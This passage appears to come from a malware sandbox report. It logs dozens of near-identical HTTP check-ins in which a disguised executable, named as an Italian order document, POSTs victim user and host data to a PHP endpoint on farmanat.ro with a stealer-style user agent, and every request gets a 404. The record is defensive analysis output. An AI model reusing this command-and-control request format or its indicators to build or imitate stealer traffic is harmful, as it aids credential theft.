                                              Nov 25, 2021 10:53:46.541218996 CET7239OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:46.599484921 CET7240INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              667192.168.11.2050512176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:47.023184061 CET7240OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:47.056586027 CET7241OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:47.113775969 CET7241INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              668192.168.11.2050513176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:47.499399900 CET7242OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:47.533529997 CET7242OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:47.601064920 CET7242INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              669192.168.11.2050514176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:47.998734951 CET7243OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:48.032182932 CET7243OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:48.095859051 CET7244INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              67192.168.11.2049903176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:43.645826101 CET6402OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:43.679338932 CET6402OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:43.728280067 CET6402INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              670192.168.11.2050515176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:48.491252899 CET7244OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:48.524857998 CET7245OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:48.585122108 CET7245INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              671192.168.11.2050516176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:49.005088091 CET7246OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:49.039268970 CET7246OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:49.098375082 CET7246INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              672192.168.11.2050517176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:49.515577078 CET7247OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:49.549032927 CET7247OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:49.603653908 CET7248INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              673192.168.11.2050518176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:49.999556065 CET7248OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:50.033163071 CET7249OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:50.088978052 CET7249INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              674192.168.11.2050519176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:50.513339996 CET7250OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:50.547584057 CET7250OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:50.604764938 CET7250INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              675192.168.11.2050520176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:51.030415058 CET7251OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:51.064649105 CET7251OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:51.115988970 CET7252INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              676192.168.11.2050521176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:51.529675961 CET7252OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:51.563894033 CET7253OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:51.617057085 CET7253INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              677192.168.11.2050522176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:52.024612904 CET7254OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:52.058469057 CET7254OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:52.111958027 CET7254INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              678192.168.11.2050523176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:52.530323982 CET7255OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:52.564259052 CET7255OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:52.614278078 CET7256INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              679192.168.11.2050524176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:52.948309898 CET7256OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:52.982491970 CET7257OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:53.032924891 CET7257INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              68192.168.11.2049904176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:44.201690912 CET6403OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:44.235889912 CET6403OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:44.288614988 CET6403INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              680192.168.11.2050525176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:53.452600002 CET7258OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:53.486818075 CET7258OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:53.537748098 CET7258INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              681192.168.11.2050526176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:53.973665953 CET7259OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:54.007888079 CET7259OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:54.059832096 CET7260INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              682192.168.11.2050527176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:54.486840010 CET7260OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:54.520416975 CET7261OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:54.569268942 CET7261INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              683192.168.11.2050528176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
